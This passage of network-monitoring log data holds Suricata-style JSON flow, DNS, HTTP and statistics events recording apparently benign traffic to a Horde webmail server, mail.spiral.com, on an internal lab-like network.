{"timestamp":"2020-02-29T00:08:33.000196+0000","flow_id":282835044059291,"event_type":"flow","src_ip":"192.168.10.122","src_port":46479,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:32.247963+0000","end":"2020-02-29T00:03:32.359559+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:38.305553+0000","flow_id":1562984426416529,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18336,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:38.414838+0000","flow_id":1562984426416529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38137,"proto":"UDP","dns":{"type":"answer","id":18336,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:38.414838+0000","flow_id":1562984426416529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38137,"proto":"UDP","dns":{"type":"answer","id":18336,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:38.458150+0000","flow_id":1380207798145143,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:08:38.458150+0000","flow_id":1380207798145143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":12,"tx_id":0}} {"timestamp":"2020-02-29T00:08:39.000204+0000","event_type":"stats","stats":{"uptime":14171,"capture":{"kernel_packets":134077,"kernel_drops":0},"decoder":{"pkts":134081,"bytes":92653443,"invalid":184,"ipv4":132614,"ipv6":8,"ethernet":134081,"raw":0,"null":0,"sll":0,"tcp":127449,"udp":4966,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2725,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2741,"synack":2732,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1766,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2265,"failed_udp":110},"tx":{"http":4562,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2344}},"flow_mgr":{"closed_pruned":2704,"new_pruned":15,"est_pruned":2315,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":41799,"memcap":0}}} {"timestamp":"2020-02-29T00:08:40.000530+0000","flow_id":1337983970224512,"event_type":"flow","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":12,"bytes_toserver":2799,"bytes_toclient":7443,"start":"2020-02-29T00:07:30.108928+0000","end":"2020-02-29T00:07:39.863656+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:43.465641+0000","flow_id":1380207798145143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34772,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:08:44.000493+0000","flow_id":322507671114127,"event_type":"flow","src_ip":"192.168.10.130","src_port":34756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":24,"bytes_toserver":2313,"bytes_toclient":23216,"start":"2020-02-29T00:07:08.037263+0000","end":"2020-02-29T00:07:43.801338+0000","age":35,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:46.000206+0000","event_type":"stats","stats":{"uptime":14178,"capture":{"kernel_packets":134091,"kernel_drops":0},"decoder":{"pkts":134094,"bytes":92655563,"invalid":184,"ipv4":132627,"ipv6":8,"ethernet":134094,"raw":0,"null":0,"sll":0,"tcp":127460,"udp":4968,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2726,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2742,"synack":2733,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1767,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2266,"failed_udp":110},"tx":{"http":4563,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2345}},"flow_mgr":{"closed_pruned":2705,"new_pruned":15,"est_pruned":2315,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":23423,"memcap":0}}} {"timestamp":"2020-02-29T00:08:48.000762+0000","flow_id":106092845825221,"event_type":"flow","src_ip":"192.168.10.122","src_port":45285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:47.425157+0000","end":"2020-02-29T00:03:47.531143+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:48.001048+0000","flow_id":1247342965809315,"event_type":"flow","src_ip":"192.168.10.122","src_port":48919,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:03:47.581795+0000","end":"2020-02-29T00:03:47.693010+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:53.000221+0000","event_type":"stats","stats":{"uptime":14185,"capture":{"kernel_packets":134091,"kernel_drops":0},"decoder":{"pkts":134094,"bytes":92655563,"invalid":184,"ipv4":132627,"ipv6":8,"ethernet":134094,"raw":0,"null":0,"sll":0,"tcp":127460,"udp":4968,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2726,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2742,"synack":2733,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1767,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2266,"failed_udp":110},"tx":{"http":4563,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2345}},"flow_mgr":{"closed_pruned":2706,"new_pruned":15,"est_pruned":2317,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19842,"memcap_state":0,"memcap_global":0},"http":{"memuse":23423,"memcap":0}}} {"timestamp":"2020-02-29T00:08:55.311909+0000","flow_id":886797661356645,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51170,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17907,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:55.421067+0000","flow_id":886797661356645,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51170,"proto":"UDP","dns":{"type":"answer","id":17907,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:55.421067+0000","flow_id":886797661356645,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51170,"proto":"UDP","dns":{"type":"answer","id":17907,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:55.580883+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7875}} {"timestamp":"2020-02-29T00:08:58.000694+0000","flow_id":642560046543245,"event_type":"flow","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":20,"bytes_toserver":3083,"bytes_toclient":18004,"start":"2020-02-29T00:07:46.405901+0000","end":"2020-02-29T00:07:57.100953+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:59.842681+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7875},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":43765,"tx_id":0}} {"timestamp":"2020-02-29T00:08:59.853060+0000","flow_id":795898973717572,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44755,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19807,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:59.961986+0000","flow_id":795898973717572,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44755,"proto":"UDP","dns":{"type":"answer","id":19807,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:59.961986+0000","flow_id":795898973717572,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44755,"proto":"UDP","dns":{"type":"answer","id":19807,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:00.000117+0000","event_type":"stats","stats":{"uptime":14192,"capture":{"kernel_packets":134094,"kernel_drops":0},"decoder":{"pkts":134112,"bytes":92665607,"invalid":184,"ipv4":132645,"ipv6":8,"ethernet":134112,"raw":0,"null":0,"sll":0,"tcp":127476,"udp":4970,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2727,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2743,"synack":2734,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1768,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2267,"failed_udp":110},"tx":{"http":4564,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2346}},"flow_mgr":{"closed_pruned":2706,"new_pruned":15,"est_pruned":2317,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20502,"memcap_state":0,"memcap_global":0},"http":{"memuse":92699,"memcap":0}}} {"timestamp":"2020-02-29T00:09:00.000475+0000","flow_id":158826455069850,"event_type":"flow","src_ip":"192.168.10.122","src_port":42601,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:59.357530+0000","end":"2020-02-29T00:03:59.469367+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:00.019586+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525}} {"timestamp":"2020-02-29T00:09:00.292803+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36696,"tx_id":1}} {"timestamp":"2020-02-29T00:09:00.304656+0000","flow_id":1395802825860624,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56407,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39008,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:00.413211+0000","flow_id":1395802825860624,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56407,"proto":"UDP","dns":{"type":"answer","id":39008,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:00.413211+0000","flow_id":1395802825860624,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56407,"proto":"UDP","dns":{"type":"answer","id":39008,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:00.482461+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":958}} {"timestamp":"2020-02-29T00:09:00.482461+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":958},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:09:01.000220+0000","flow_id":1832429181487928,"event_type":"flow","src_ip":"192.168.10.122","src_port":47014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:00.084792+0000","end":"2020-02-29T00:04:00.190190+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:05.483487+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":958},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2478,"tx_id":2}} {"timestamp":"2020-02-29T00:09:06.448779+0000","flow_id":816196989671691,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40498,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23974,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:06.465234+0000","flow_id":1235763754834258,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50319,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28746,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:06.557375+0000","flow_id":816196989671691,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40498,"proto":"UDP","dns":{"type":"answer","id":23974,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:06.557375+0000","flow_id":816196989671691,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40498,"proto":"UDP","dns":{"type":"answer","id":23974,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:06.573102+0000","flow_id":1235763754834258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50319,"proto":"UDP","dns":{"type":"answer","id":28746,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:06.573102+0000","flow_id":1235763754834258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50319,"proto":"UDP","dns":{"type":"answer","id":28746,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:06.763752+0000","flow_id":1278752082539280,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6127}} {"timestamp":"2020-02-29T00:09:06.849661+0000","flow_id":1096924642080953,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34776,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:09:06.858247+0000","flow_id":1205458465593479,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58650,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":55420,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:06.968272+0000","flow_id":1205458465593479,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58650,"proto":"UDP","dns":{"type":"answer","id":55420,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:06.968272+0000","flow_id":1205458465593479,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58650,"proto":"UDP","dns":{"type":"answer","id":55420,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:07.000198+0000","event_type":"stats","stats":{"uptime":14199,"capture":{"kernel_packets":134141,"kernel_drops":0},"decoder":{"pkts":134146,"bytes":92679633,"invalid":184,"ipv4":132675,"ipv6":8,"ethernet":134146,"raw":0,"null":0,"sll":0,"tcp":127502,"udp":4974,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2727,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2743,"synack":2734,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1768,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2269,"failed_udp":110},"tx":{"http":4566,